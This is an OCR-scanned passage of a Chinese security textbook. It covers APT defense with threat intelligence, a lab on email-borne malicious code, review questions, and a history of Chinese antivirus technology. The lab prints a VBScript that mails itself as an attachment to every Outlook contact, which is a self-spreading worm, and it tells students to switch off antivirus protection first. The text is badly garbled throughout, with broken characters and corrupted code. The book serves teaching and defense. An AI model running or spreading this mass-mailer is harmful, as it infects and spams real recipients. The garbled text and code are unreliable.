的 网 络 链接 就 进入 了 恶意 网 站 。 该 恶意 网 站 页 面 含 有 Shellcode 的 JavaScript 脚本 造成 了 
IE 浏览 大 溢出 ,进而 执行 FTP 下 载 程序 。 攻 击 者 通过 SSL 安全 隧道 与 受害 人 机 需 建 立 了 
链接 ,持续 监听 最 终 获 得 了 该 座 员 访问 Google 服务 需 的 账号 和 密码 等 信息 。 最 后 攻击 者 就 
使 用 该 雇员 的 凭证 成 功 渗 透 进入 了 Google 的 邮件 服务 大 ,进而 不 断 地 获取 特定 Gmail 账户 
的 邮件 内 容 。 


9.6.4 APT 的 防范 


通过 前 面 的 介绍 可 知 ,APT 不 像 早 期 简单 的 黑客 攻击 ,因此 ,对 APT 的 防范 是 目前 信 
息 安 全 领域 的 难点 问题 。 近 年 来 ,威胁 情报 分 析 往 往 被 用 作 防 范 APT 的 方法 。 

目前 ,无 论 是 工业 界 还 是 学 术 界 对 威胁 情报 都 还 没有 一 个 统一 的 定义 ,许多 机 构 或 论文 
都 对 威胁 情报 的 概念 进行 过 阐述 ,目前 接受 范围 较 广 的 是 Gartner 在 2014 年 发 表 的 《安全 
威胁 情报 服务 市 场 指 南 》(Market Guide for Security Threat Intelligence Service ) 中 提出 
的 定义 。 威 胁 情报 是 关于 IT 或 信息 资产 所 面临 的 现 有 或 潜在 威胁 的 循 证 知识 ,包括 情境 、 
机 制 、 指 标 、 推 论 与 可 行 建议 ,这 些 知 识 可 为 威胁 啊 应 提供 决策 依据 。 

针对 APT 防范 的 威胁 情报 包括 APT 操作 者 的 最 新 信息 ,从 恶意 软件 分 析 系 统 中 获取 
的 威胁 情报 ; 已 知 的 不 良 域 名 .电子 邮件 地 址 、 恶意 电 子 邮 件 附件 .电子 邮件 主题 ; 恶意 
接 和 网 站 。 

除了 威胁 情报 分 析 系 统 能 够 用 于 防范 APT 攻击 之 外 ,还 有 比较 传统 的 方法 , 那 就 是 针 
对 APT 攻击 的 核心 步骤 展开 的 防范 。 

纵 观 整个 APT 攻击 过 程 , 可 以 发 现 APT 攻击 的 关键 步骤 包括 攻击 者 通过 恶意 代码 对 
员工 个 人 计算 机 进行 单 点 攻击 突破 攻击 者 的 内 部 横 问 渗透 、 通 过 构建 的 控制 通道 获取 攻击 
者 指令 ,以 及 最 后 的 敏感 数据 外 传 等 过 程 。 当 前 的 APT 攻击 检测 和 防御 方案 其 实 都 是 围 
绕 这 些 步骤 展开 的 ,它们 分 为 以 下 4 类 。 

1. 恶意 代码 检测 类 方案 

恶意 代码 检测 类 方案 主要 有 覆盖 APT 攻击 过 程 中 的 单 点 攻击 突破 阶段 , 它 检 测 APT 攻 
击 过 程 中 的 恶意 代码 传播 过 程 。 大 多 数 APT 攻击 都 是 通过 恶意 代码 来 攻击 员工 个 人 计算 
机 ,从 而 来 突破 目标 网 络 和 系统 防御 措施 的 ,因此 ,恶意 代码 检测 对 于 检测 和 防御 APT 攻 
击 至 头 重要。 

2. 主机 应 用 保护 类 方案 

主机 应 用 保护 类 方案 主要 履 盖 APT 攻击 过 程 中 的 单 点 攻击 突破 和 数据 搜集 上 传 阶 
段 。 不 管 攻击 者 通过 何 种 渠道 向 员工 个 人 计算 机 发 送 恶 意 代码 ,这 个 恶意 代码 必须 在 员工 
计算 机 上 执行 才能 控制 整个 设备 。 因 此 ,如 果 能 够 加 强 系统 内 各 主机 节点 的 安全 措施 ,确保 
员工 个 人 计算 机 及 服务 硕 的 安全 ,就 可 以 有 效 防御 APT 攻击 。 
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3. 网 络 入 侵 检测 类 方案 


网 络 入 侵 检 测 类 方案 主要 覆盖 APT 攻击 过 程 中 的 控制 通道 构建 阶段 ,通过 在 网 络 边 
界 处 部 署 和 人 侵 检测 系统 来 检测 APT 攻击 的 命令 和 控制 通道 。 安 全 分 析 人 员 发 现 ,虽然 
APT 攻击 所 使 用 的 恶意 代码 变种 多 且 升 级 频繁 ,但 恶意 代码 所 构建 的 命令 控制 通道 通信 模 
式 并 不 经 稼 变 化 ， 因此 ， 可 以 采用 传统 入 侵 检测 方法 来 检测 APT 的 命令 控制 通道 。 该 类 方 
案 成 功 的 关键 是 如 何 及 时 获取 到 各 APT 攻击 手法 的 命令 控制 通道 的 检测 特征 。 

4. 大 数据 分 析 检 测 类 方案 

大 数据 分 析 检 测 类 方案 并 不 重点 检测 APT 攻击 中 的 某 个 步骤 , 它 覆 盖 了 整个 APT 攻 
击 过 程 。 该 类 方案 是 一 种 网 络 取证 思路 , 它 全 面 采集 各 网 络 设备 的 原始 流量 及 各 终 病 和 服 
务 大 上 的 日 志 , 然 后 进行 集中 的 海量 数据 存储 和 这 入 分 析 , 它 可 在 发 现 APT 攻击 的 一 点 蛛 
丝 马 迹 后 ,通过 全 面 分 析 这 些 海量 数据 来 还 原 整个 APT 攻击 场景 。 大 数据 分 析 检 测 方案 


因为 涉及 海量 数据 处 理 , 因 此 需要 构建 大 数据 存储 和 分 析 平 台 , 比 较 典 型 的 大 数据 分 析 平 台 
有 Spark 、 Hadoop 等 。 


9.7 综合 实验 
综合 实验 十 : 邮件 型 恶意 代码 实验 


【实验 目的 】 

掌握 邮件 型 恶意 代码 的 基本 原理 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) Outlook 邮件 客户 端 。 

【实验 步骤 】 

(1) 在 Outlook 中 设置 用 户 账 号 。 

(2) 在 Outlook 地 址 竹中 添加 联系 人 。 

(3) 在 实验 的 计算 机 上 的 C 根 目录 下 创建 空 文件 test. vbs。 

(4) 关闭 反 病毒 软件 的 实时 防护 功能 。 

(5) 把 实验 代码 录入 到 test. vbs 文件 中 。 

(6) 运行 脚本 文件 ,程序 启动 Outlook( 由 于 现在 的 Outlook 版 本 较 高 ,Outlook 会 提示 
是 否 允 许 操作 ,请 选择 允许 ) 发 送 邮 件 。 

【实验 注意 事项 】 

(1) 要 成 功 实 验 ,系统 必 须 安装 Outlook Applicaton 应 用 软件 。 

(2) 为 了 不 给 目 己 的 地 址 禾 联 系 人 传送 垃圾 邮件 ,可 以 先 将 地 址 注 中 的 联系 人 导出 , 然 
后 输入 实验 用 邮件 地 址 。 实 验 结束 后 ,再 重新 导入 原来 地 址 竹中 的 联系 人 。 

(3) 程序 运行 后 ,打开 实验 用 邮箱 查看 实验 结果 。 一 般 而 言 ,由 于 现在 的 邮件 服务 副 部 
会 对 邮件 进行 扫描 ,因此 传送 了 恶意 代码 的 邮件 不 能 传送 到 邮箱 。 解 决 办 法 是 : 将 程序 中 
的 一 个 语句 ObjMail. Attachments. Add ("c:\test. vbs") 删 除 ,或 者 将 附件 c:\test. vbs 文 
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件 内 容 改 为 其 他 内 容 。 
【实验 源码 】 


//code begin 

Set objOA = Wscript. CreateObject("Outlook. Application") 
Set objMapi = objOA. GetNameSpace("MAPI") 

For 1 = 1 to objMapi. AddressLists. Count 

Set objAddList = objMapi. AddressLists(i) 

For ] =1 To objAddList. AddressEntries. Count 

Set objMail = ob]jOA. CreateItem(0) 

ObjMail. Recipients. Add(objAddList. AddressEntries(]j)) 
0bjMail. Subject = "你 好 !" 

0bjMail. Body = "这 次 给 你 的 附件 是 我 的 实验 题 ! 如 果 收 到 附件 请 不 要 下 载 ,不 要 打开 ." 
ObjMail. Attachments. Add("c:\test. vbs") 

ObjMail. Sent 

Next 

Next 

Set objMapi = Nothing 

Set objOA = Nothing 


//code end 
9.8 四 古 
一 、 填 空 题 
1. 僵尸 网 络 的 主要 特征 是 和 一 对 多 控制 。 
2. Rootkit 是 攻击 者 用 来 和 的 工具 。 
3. 到 本 书 出 版 为 止 ,最 难 防 范 的 恶意 代码 及 攻击 行为 主要 包括 和 
两 种 。 
二 、 选 择 题 
1. 多 数 流氓 软件 具有 ) 特 征 。 
A. 强迫 安 六 B. 无 法 凶 载 
C. 干扰 使 用 D. 病毒 和 黑客 
2. APT 的 两 个 主要 特征 包括 ( 上 
A. 强迫 安 疲 B. 高 级 先进 
C. 持续 性 D. 传播 速度 快 


1. 流 谍 软 件 是 近期 提出 的 新 概念 ,请 问 流 谍 软 件 和 传统 计算 机 病毒 的 区 别 是 什么 ? 
2. 僵尸 网 络 的 主要 类 型 有 哪些 ? 

3. 试探 讨 Rootkit 恶意 代码 的 原理 及 其 防范 方法 。 

四 、 实 操 题 

1. 学 习 并 实践 基于 邮件 漏洞 的 恶意 代码 。 

2. 掌握 并 实验 WebPage 中 的 恶意 代码 。 

3. 收集 能 够 预防 和 杀 除 恶意 代码 .流氓 软件 的 工具 ,并 学 习 其 使 用 方法 。 


10 重 ”恶意 代码 防 纶 技术 


由 熊猫 软 件 公 司 进 行 的 一 项 调查 表明 : 38% 的 被 调查 者 认为 他 们 不 需要 防 病毒 保护 ， 
因为 他 们 并 不 经 常 上 网 ,只 是 有 时 利用 它 来 访问 可 靠 的 网 站 ,或 和 亲友 之 间 互 发 电子 邮件 。 
同样 ,英国 电信 的 一 次 调查 也 显示 了 这 一 观念 倾 问 : 28% 的 英国 中 小 企业 认为 采用 防 病毒 
和 防火 墙 等 安全 措施 对 他 们 来 说 并 不 重要 。 

通过 前 面 的 学 习 , 读 者 已 经 知道 恶意 代码 非常 危险 ,计算 机 系统 一 旦 感染 了 恶意 代码 ， 
其 后 果 往 往 是 不 堪 设 想 的 。 恶 意 代 码 是 十 分 狭 独 的 ,只 要 计算 机 连接 在 网 络 上 ,只 要 浏览 网 
页 或 收发 电子 邮件 ,恶意 代码 就 可 能 会 让 计算 机 用 户 防 不 胜 防 。 因 此 ,恶意 代码 的 防范 是 非 
常 有 用 的 技术 。 本 章 把 恶意 代码 防范 分 为 6 个 层次 : 检测 清除、 了 预防、 免疫、 防范 策略 、 备 
份 及 恢复 等 。 其 中 ,防范 策略 在 第 12 草 详 细 介绍 。 

本 章 学 习 目 标 

(1) 掌握 恶意 代码 防范 的 层次 结构 。 

(2) 理解 恶意 代码 检测 知识 及 实验 。 

(3) 掌握 恶意 代码 清除 知识 。 

(4) 和 擎 握 恶 意 代 码 预 防 知识 。 

(5) 和 擎 握 恶 意 代 码 免疫 思路 。 


10.1 恶意 代码 防 邯 技术 的 发 展 


在 恶意 代码 防范 的 初期 ,编写 反 恶 意 代 码 软 件 并 不 困难 。 在 20 世纪 80 年 代 末 和 90 年 
代 初 ,许多 技术 人 员 通 过 上 自己 编写 针对 特定 类 型 的 恶意 代码 防护 程序 ,来 防御 专 一 的 恶意 
代码 。 

Frederick Cohen 证 明 ,因为 无 法 创建 一 个 单独 的 程序 ,能 在 有 限 的 时 间 里 检测 出 所 有 
未 知 的 计算 机 病毒 ,同样 ,对 恶意 代码 这 个 问题 就 更 是 无 法 解决 的 了 。 但 是 ,尽管 有 很 多 缺 
点 , 反 恶 意 代 码 程 序 应 用 仍然 是 非常 广泛 的 。 

非常 不 征 的 是 , 踢 忽 往 往 是 造成 恶意 代码 传播 的 最 大 隐患 之 一 。 在 计算 机 安全 中 ,社会 
工程 学 方面 的 因素 比 技术 方面 的 因素 显得 更 为 重要 。 计 算 机 维护 和 网 络 安全 配置 上 的 最 小 
草 忽 ,未 及 时 清除 已 感染 的 恶意 代码 ,都 为 恶意 代码 的 扩散 打开 了 方便 之 门 。 

在 检测 和 清除 的 最 初 阶段 ,由 于 数量 少 , 因 此 恶意 代码 非常 容易 对 付 (1990 年 时 才 仅 仅 
不 到 100 个 普通 计算 机 病毒 )。 初 期 的 恶意 代码 容易 对 付 的 原因 之 一 是 扩散 速度 非常 缓慢 。 
引导 区 病毒 往往 要 经 过 一 年 或 者 更 长 的 时 间 才 能 从 一 个 国家 传播 到 男 外 一 个 国家 。 那 个 时 
修 的 恶意 代码 传播 只 能 徘 “ 软 盘 十 邮政 ”的 形式 ,无 法 和 现在 的 互联 网 相 比 较 。 

1989 年 ,苏联 的 Eugene Kaspersky 开始 研究 计算 机 病毒 现象 。1991 一 1997 年 ,他 在 俄 罗 
斯 大 型 计算 机 公司 KAMI 的 信息 技术 中 心 ,市 领 一 批 助 手 研发 出 了 AVP 反 病 毒 程序 ,AVP 的 
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反 病 毒 引擎 和 病毒 库 , 一 直 以 其 严谨 的 结构 、 彻 底 的 查 杀 能 力 为 业界 称道 。1997 年 , Eugene 
Kaspersky 作为 创始 人 之 一 成 立 了 Kaspersky Lab。2000 年 11 月 ,AVP 锡 名 为 Kaspersky 
Anti-Virus。Eugene Kaspersky 也 是 计算 机 反 病 毒 赋 究 员 协会 (CCARO) 的 成 员 。 

在 中 国 , 王 江 民 是 我 国 最 早 的 计算 机 反 病 毒 专家 之 一 ,也 是 江 民 杀毒 软件 创始 人 。 他 于 
1989 年 开始 从 事 微机 反 病 毒 研 究 , 开 发 出 KV 系列 反 病 毒 软件 , 占 反 病毒 市 场 80% ,正版 用 
户 接近 100 万 。1996 年 ,KV300 一 江 民 科技 正式 成 立 , 取 得 了 单 月 销售 超过 干 万 元 的 历史 
最 好 纪录 ,成 功 实现 从 DOS 加 Windows 时 代 反 计算 机 病毒 的 转换 。 从 20 世纪 90 年 代 开 
始 至 今 ,我 国 反 恶 意 代 码 软 件 市 场 历 经 一 统 天 下 .竞相 降价 .媒体 造势 .诉讼 官司 等 各 种 市 场 
阶段 。 奇 虎 360 在 2008 年 率先 推出 了 免费 的 云 安 全 杀毒 软件 一 一 《360 杀毒 》, 直 接 针 对 之 
前 的 三 巨头 一 一 金山 .瑞星 、 江 民 , 从 而 开局 了 我 国 反 恶 意 代 码 的 免费 时 代 。 其 后 ,瑞星 、 金 
山 也 相继 宣布 免费 。 金 山 毒 霸 甚 至 推出 " 敢 赔 服务 ”一 一 因 金 山 毒霸 不 及 时 进行 拦截 而 导致 
用 户 遭 受 经 济 损失 的 ,金山 公司 会 提供 现金 赔偿 。 另 外 ,我 国 一 些 传 统 互联 网 公司 ,如 腾讯 、 
百度 也 纷纷 介入 反 恶 意 代 码 软 件 的 市 场 争 村 战 中 ,推出 各 种 免费 服务 。 


10.2 ”中国 恶意 代码 防范 技术 的 发 展 


从 1988 年 我 国 发 现 第 一 个 传统 计算 机 病毒 "小 球 ” 算 起 ,至 今 中 国 计 算 机 反 恶 意 代码 之 
路 已 经 走 过 了 30 年 。 在 攻防 双方 经 历 了 长 期 的 争斗 后 ,恶意 代码 迄今 为 止 已 经 超过 了 100 
万 种 ,而 反 恶 意 代 码 技术 也 已 经 更 新 了 一 代 又 一 代 。 

在 DOS、Windows 时 代 (1988 一 1998 年 ) ,主要 研究 防范 文件 型 和 引导 区 型 的 传统 病毒 
的 技术 。 接 下 来 的 10 年 是 互联 网 时 代 (1998 一 2008 年 ) ,主要 是 针对 蠕虫 .木马 的 防范 技术 
进行 研究 。2008 年 以 后 ,恶意 代码 更 加 复杂 ,多数 新 恶意 代码 是 集 后 门 、 木马 .蠕虫 等 特征 
于 一 体 的 混合 型 产物 。 新 时 代 的 恶意 代码 的 危害 方式 也 发 生 了 根本 转变 ,主要 集中 在 浪费 
资源 、 客 取信 息 等 。 下 面 分 时 代 摘 述 中国 恶 意 代 码 的 防范 之 路 。 

1. DOS 杀毒 时 代 

20 世纪 80 年 代 末 ,国内 先后 出 现 了 “小 球 ” 和 “大 麻 ” 等 传统 计算 机 病毒 ,而 当时 国内 并 
没有 杀毒 软件 ,一 些 程序 员 使 用 Debug 来 跟 踊 并 清除 病毒 ,这 也 成 为 最 早 、 最 原始 的 手工 杀 
毒 技 术 。Debug 通过 跟 踊 程序 运行 过 程 ,寻找 病毒 的 突破 口 ,然后 通过 Debug 强大 的 编译 
功能 将 其 清除 。 在 早期 的 反 病 毒 工 作 中 ,Debug 发 挥 了 重大 作用 ,但 由 于 使 用 Debug 需要 
精通 汇编 语言 和 一 些 底 层 技 术 , 因 此 能 够 熟练 使 用 Debug 杀 病 毒 的 人 并 不 多 。 早 期 经 常 使 
用 Debug 分 析 病 毒 的 程序 员 ,在 长 期 的 杀毒 工作 过 程 中 积累 了 丰富 经 验 及 病毒 样本 ,多 数 
成 为 后 来 计算 机 反 病 毒 行业 的 中 坚 技术 力量 。 

随 着 操作 系统 和 恶意 代码 技术 的 发 展 ,以 及 传统 病毒 逐渐 退出 历史 舞台 ,现在 的 研 
究 人 员 已 经 很 少 用 Debug 去 分 析 病 毒 ,而 是 普 过 应 用 了 IDA、OllyDbg ,SoftICE 等 反 编 详 
工具 。 

恶意 代码 的 增加 使 得 手工 跟 踩 越 来 越 不 现实 ,便于 商业 化 的 防范 技术 便 应 运 而 生 。 其 
中 ,最 具 代 表 性 的 是 特征 码 扫描 技术 。 特 征 码 扫描 技术 主要 由 特征 码 库 和 扫描 算法 构成 。 
而 特征 码 库 是 可 以 方便 升级 的 部 分 ,因此 更 加 适合 商业 化 。 随 着 恶意 代码 攻击 技术 的 发 展 ， 
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反 恶 意 代 码 技 术 也 逐步 进化 ,出 现 了 广 谱 杀 毒 技 术 、 宏 杀毒 技术 、 以 毒 攻 毒 法 .内 存 监控 法 、 
虚拟 机 技术 、 启 发 式 分 析 法 、 指 纹 分 析 法 .神经 网 络 系统 等 。 
2， Windows 时 代 


随 着 Windows 95 和 Windows 98 操作 系统 的 逐渐 普及 ,计算 机 开始 进入 可 视 化 视窗 时 
代 ,计算 机 与 外 界 数据 交换 越 来 越 频 繁 ,恶意 代码 开始 从 各 种 途径 入 侵 。 除 了 软盘 外 ,光盘 、 
硬盘、 网 络 共享 邮件、 网 络 下 载 .注册 表 等 都 可 能 成 为 病毒 感染 的 通道 。 病 毒 越 来 越 多 ,一 
味 地 杀毒 将 使 计算 机 用 户 疲 于 应 付 , 这 时 , 反 病 毒 工程 师 开 始 意识 到 有 效 防 御 病毒 比 单纯 杀 
毒 对 于 用 户 来 讲价 值 更 大 。1999 年 ,中 国 的 江 民 公司 研发 成 功 病毒 实时 监控 技术 ,首次 突 
破 了 杀毒 软件 的 单一 杀毒 概念 ,开创 了 从 “杀毒 ”到 “ 反 病 毒 * 新 时 代 。 从 此 ,杀毒 软件 也 开始 
摆脱 了 一 张 杀 毒 盘 的 概念 。 安 装 版 的 杀毒 软件 与 操作 系统 同步 运行 ,对 通过 文件 .邮件 、 网 
页 等 途径 进入 计算 机 的 数据 进行 实时 过 滤 ,发现 病 毒 在 内 存 阶段 立即 清除 ,抵御 病毒 于 系统 
之 外 。 

随 着 这 一 技术 的 发 展 和 完善 ,目前 实时 监控 技术 已 经 非常 完善 ,典型 的 实时 监控 系统 具 
有 文件 监视 .邮件 监视 .网 页 监视 .即时 通信 监视 .木马 注册 表 监 视 . 脚 本 监视 .隐私 信息 保护 
七 大 实时 监控 功能 。 从 入 侵 通 道 封杀 病毒 ,成 为 日 前 杀毒 软件 最 主流 和 最 具有 价值 的 核心 
技术 。 

衡量 一 款 杀 毒 软件 的 查 杀 能 力 , 也 主要 测试 其 实时 监控 性 能 。 例 如 ,网 页 上 发 现 的 病 
毒 ,是 在 下 载 过 程 中 报警 并 清除 ,还 是 在 下 载 完 毕 后 才 报 警 并 处 理 ? 经 过 层 层 压缩 和 加 密 的 
病毒 ,杀毒 软件 是 在 建 目录 时 便 能 侦 测 到 并 报警 ,还 是 选择 了 这 个 病毒 压缩 包 后 才 报 警 ? 病 
毒 实时 监控 技术 又 包含 比特 动态 滤 毒 技术 ,深层 杀毒 技术 、 神 经 敏感 系统 技术 等 ,这 些 技术 
使 得 杀毒 软件 在 实时 监控 病毒 时 更 灵敏 ,清除 病毒 也 更 彻底 。 

3. 互联 网 时 代 

从 2003 年 以 来 ,伴随 着 互联 网 的 高 速 发 展 ,恶意 代码 也 进入 了 愈加 猩 狂 和 泛滥 的 新 阶 
段 ,并 呈现 出 种 类 和 数量 迅速 增长 ,传播 手段 越 来 越 广泛 技术 水 平 越 来 越 高 .危害 越 来 越 大 
等 特征 。 伴 随 着 恶意 代码 攻击 技术 的 飞速 发 展 , 一 些 新 的 恶意 代码 防范 技术 也 应 运 而 生 。 

1) 未 知 病毒 主动 防御 技术 

未 知 病毒 主动 防御 不 同 于 常规 的 特征 扫描 技术 ,其 核心 原理 是 依据 行为 进行 判断 。 主 
动 防御 监测 系统 主要 依靠 本 身 的 鉴别 系统 ,分 析 某 种 应 用 程序 运行 进程 的 行为 ,从 而 判断 它 
的 行为 ,达到 主动 防御 的 目的 。 

当前 的 杀毒 软件 都 是 通过 从 病毒 样本 中 提取 病毒 特征 值 来 构成 病毒 特征 库 的 ,采用 特 
征 扫 摘 技术 ,通过 与 计算 机 中 的 应 用 程序 或 者 文件 等 的 特征 值 逐 一 比 对 ,来 判断 计算 机 是 和 否 
已 经 被 病毒 感染 , 即 由 专业 反 病 毒 人 员 在 反 病 毒 公司 对 可 疑 程序 进行 人 工分 析 和 人 研究 。 杀 
毒 软件 厂商 只 有 通过 用 户 上 报 或 者 通过 技术 人 员 在 网 络 上 搜索 才能 捕获 到 新 病毒 ,然后 从 
新 病毒 中 提取 病毒 特征 值 添 加 到 病毒 库 中 ,用 户 通 过 升级 获取 最 新 的 病毒 库 , 才 能 判断 某 个 
程序 是 病毒 。 

如 果 用 户 不 升级 ,用 户 计算 机 上 安装 的 杀毒 软件 就 不 能 防范 新 出 现 的 病毒 ,这 也 是 专业 
反 病 毒 工程 师 一 直 强 调用 户 要 及 时 升级 杀毒 软件 病毒 库 的 原因 。 这 种 特征 值 扫描 技术 的 原 
理 决定 了 杀毒 软件 的 滞后 性 ,使 用 户 不 能 对 网 络 新 病毒 及 时 防御 ,网 络 病毒 的 频频 爆发 已 经 
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使 国际 与 国内 反 病 毒 领域 开始 意识 到 ,亡羊补牢 式 的 防范 技术 越 来 越 被 动 ,所 以 主动 防御 监 
测 技术 应 运 而 生 。 

2) 系统 司 动 前 杀毒 技术 

近年 来 ,一 系列 计算 机 新 技术 被 恶意 代码 利用 ,人 们 发 现 ,恶意 代码 开始 越 来 越 难 清除 
了 ,中 了 毒 无 法 查 出 , 查 出 病毒 又 无 法 清除 ,甚至 杀毒 软件 反 被 感染 的 事情 也 时 有 发 生 。 
Rootkit ,插入 线程 .插入 进程 等 计算 机 技术 已 经 成 为 木马 的 常用 办 法 。BOOTSCAN 系统 
启动 前 防范 技术 正 是 针对 这 类 疑难 恶意 代码 。 此 项 技术 在 系统 启动 之 前 就 调用 杀毒 引擎 扫 
摘 和 清除 病毒 ,因为 在 这 一 阶段 病毒 的 一 些 上 月 我 保护 和 对 抗 反 病 毒 技 术 的 功能 还 没有 运行 ， 
比较 容易 被 清除 。 

3) 反 Rootkit、Hook 技术 

越 来 越 多 的 恶意 代码 开始 利用 Rootkit 技术 隐藏 目 身 ,利用 Hook 技术 破坏 系统 文件 ， 
防止 被 安全 软件 所 查 杀 。 反 病毒 Rootkit、 反 病毒 Hook 技术 能 够 检测 出 深 藏 的 病毒 文件 、 
进程 .注册 表 键 值 ,并 能 够 阻止 病毒 利用 Hook 技术 破坏 系统 文件 ,接管 病毒 Hook, 防 御 恶 
意 代 码 于 系统 之 外 。 

4) 虚拟 机 脱 壳 

虚拟 机 的 原理 是 在 系统 上 虚拟 一 个 操作 环境 ,让 病毒 运行 在 这 个 虚拟 环境 之 下 ,在 病毒 
现 出 原形 后 将 其 清除 。 虚 拟 机 目前 主要 应 用 在 脱 充 方 面 ,许多 未 知 病毒 其 实 是 换 汤 不 换 药 


的 ,只 是 在 原 病毒 基础 上 加 了 一 个 充 , 如 果 能 成 功 地 把 病毒 的 这 层 充 脱 掉 ,就 很 容易 将 病毒 
清除 了 。 


5) 内 核 级 主动 防御 

日 2008 年 以 来 ,大 部 分 主流 恶意 代码 都 进入 了 驱动 级 ,开始 与 安全 工具 争 抢 系统 驱动 
的 控制 权 , 在 取得 系统 驱动 控制 权 后 ,继而 控制 更 多 的 系统 权限 。 

内 核 级 主动 防御 技术 能 够 在 CPU 内 核 阶段 对 恶意 代码 进行 拦截 和 清除 。 内 核 级 主动 
防御 系统 将 查 杀 模块 直接 移植 到 系统 核心 层 百 接 监 控 恶 意 代 码 , 让 工作 在 系统 核心 态 的 驱 
动 程序 去 拦截 所 有 的 文件 访问 ,是 计算 机 信息 安全 领域 技术 发 展 的 新 方向 。 

在 网 络 空 间 攻 防 形势 迅速 发 展 的 今天 ,杀毒 软件 需要 对 付 的 已 不 仅仅 是 最 早 的 病毒 , 即 
那些 具有 感染 性 的 少数 恶意 代码 ,而 是 需要 对 付 包 括 蠕虫 木马 \ 有 害 工 具 等 在 内 的 各 种 亚 
意 代 码 。 为 完成 这 一 复杂 且 艰 巨 的 任务 ,必须 掌 握 “ 反 病毒 引擎 核心 技术 。 反 病毒 引擎 技 
本 难度 较 大 ,需要 长 期 技术 积累 ,我 国 研 发 反 病 毒 引 擎 技术 起 步 并 不 算 晚 ,但 距离 国际 知名 
厂商 的 水 平一 下 有 一 定 差距 ,一 些 网 络 安全 产品 中 不 得 不 采用 外 国 的 引擎 ,这 显然 存在 着 安 
全 隐患 。 近 年 来 ,我 国 三 商 通过 目 主 创新 大力 研发 ,在 这 一 核心 技术 领域 进步 显著 ,并 取得 
了 令 人 瞩目 的 成 绩 。 

2013 年 ,中 国 厂商 安 天 的 Antiy AVL 被 国际 顶级 反 病 毒 评 测 机 构 AV-TEST 评 为 年 
度 最 佳 产 品 , 这 也 是 亚洲 三 商 首次 获得 此 奖 ,此 前 ,AV-TEST 的 奖项 全 部 为 欧美 厂商 所 包 
揽 。2014 年 ,360 AntiVirus 和 猎豹 移动 Clean Master 获得 AV-TEST 年 度 最 佳 Android 
安全 产品 奖 。 在 著名 安全 软件 测试 机 构 AV-Comparatives( 人 简称 AV-C) 2017 年 的 软件 评 
测 中 ,腾讯 4 次 获得 Advanced 十 的 评级 。 
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10.3 恶意 代码 防范 思路 


从 恶意 代码 防范 的 历史 和 未 来 趋势 来 看 ,要 想 成 功 防范 越 来 越 多 的 恶意 代码 ,使 用 户 免 
受 恶意 代码 侵扰 ,需要 从 以 下 6 个 层次 开展 : 检测 清除、 预防 、 免 疫 、 数 据 备份 及 恢复 、 防 范 
策略 。 

恶意 代码 的 检测 技术 是 指 通 过 一 定 的 技术 手段 判定 恶意 代码 的 一 种 技术 。 这 也 是 传统 
计算 机 病毒 、 木 马 、 蠕 虫 等 恶意 代码 检测 技术 中 最 和 常用、 最 有 效 的 技术 之 一 。 其 典型 的 代表 
方法 是 特征 码 扫 描 法 。 

恶意 代码 的 清除 技术 是 恶意 代码 检测 技术 发 展 的 必然 结果 ,是 恶意 代码 传染 过 程 的 一 
种 逆 过 程 。 也 就 是 说 ,只 有 详细 掌握 了 恶意 代码 感染 过 程 的 每 一 个 细节 ,才能 确定 清除 该 恶 
意 代码 的 方法 。 值 得 注意 的 是 , 随 着 恶意 代码 技术 的 发 展 ,并 不 是 每 个 恶意 代码 都 能 够 被 详 
细 分 析 ,因此 ,也 并 不 是 所 有 恶意 代码 都 能 够 成 功 清 除 。 正 是 基于 这 个 原因 ,数据 备份 和 恢 
复 才 显得 尤为 重要 。 

恶意 代码 的 预防 技术 是 指 通 过 一 定 的 技术 手段 防止 恶意 代码 对 系统 进行 传染 和 破坏 ， 
实际 上 它 是 一 种 预先 的 特征 判定 技术 。 具 体 来 说 ,恶意 代码 的 预防 是 通过 阻止 计算 机 恶意 
代码 进入 系统 或 阻止 恶意 代码 对 磁盘 的 操作 尤其 是 写 操 作 ,以 达到 保护 系统 的 目的 。 恶 意 
代码 的 预防 技术 主要 包括 磁盘 引导 区 保护 、 加密 可 执行 程序 . 读 写 控制 技术 和 系统 监控 技 
术 、 系 统 加 固 ( 如 打 补 丁 ) 等 。 在 蠕虫 泛滥 的 今天 ,系统 加 固 方 法 的 地 位 越 来 越 重 要 ,处 于 不 
可 替代 的 地 位 。 

恶意 代码 的 免疫 技术 出 现 非常 早 , 但 是 没有 很 大 发 展 。 针 对 某 一 种 恶意 代码 的 免疫 方 
法 已 经 没有 人 上 青 用 了 ,而 目前 尚 没 有 出 现 通 用 的 能 对 各 种 恶意 代码 都 有 人 免疫 作用 的 技术 ,从 
某 种 程度 上 来 说 ,也 许 根 本 就 不 存在 这 样 的 技术 。 根 据 免 疫 的 性 质 , 可 以 把 它 归 为 预防 技 
术 。 从 本 质 上 讲 , 对 计算 机 系统 而 言 ,计算 机 预防 技术 是 被 动 预防 技术 ,通过 外 围 的 技术 增 
加 计算 机 系统 的 防范 能 力 ; 而 计算 机 免疫 技术 是 主动 的 预防 技术 ,通过 计算 机 系统 本 号 的 
技术 增加 自己 的 防范 能 力 。 

数据 备份 及 数据 恢复 是 在 清除 技术 无 法 满足 需要 的 情况 下 而 不 得 不 采用 的 一 种 防范 技 
术 。 随 着 恶意 代码 的 攻击 技术 越 来 越 复杂 ,以 及 恶意 代码 数量 的 爆炸 性 增长 ,清除 技术 遇 到 
了 发 展 瓶颈 。 数 据 备份 及 数据 恢复 的 思路 是 : 在 检测 出 某 个 文件 被 感染 了 恶意 代码 后 ,不 
去 试图 清除 其 中 的 恶意 代码 使 其 恢复 正常 ,而 是 直接 用 事先 备份 的 正常 文件 覆盖 被 感染 后 
的 文件 。 数 据 备 份 及 数据 恢复 中 的 数据 的 含义 是 多 方面 的 , 既 指 用 户 的 数据 文件 ,也 指 系统 
程序 .关键 数据 (注册 表 ) .常用 应 用 程序 等 。 “三 分 技术 ,七 分 管理 .十 二 分 数据 ?的 说 法 成 为 
现代 企业 信息 化 管理 的 标志 性 注释 。 这 充分 说 明 ,信息 、 知 识 等 数据 资源 已 经 成 为 继 土地 和 
资本 之 后 最 重要 的 财富 来 源 。 

恶意 代码 的 防范 策略 是 管理 手段 ,而 不 是 技术 手段 。ISO 17799 是 关于 信息 安全 管理 
体系 的 详细 标准 , 它 表 达 了 一 个 思想 , 即 信 息 安全 是 一 个 复杂 的 系统 工程 。 在 这 个 系统 工程 
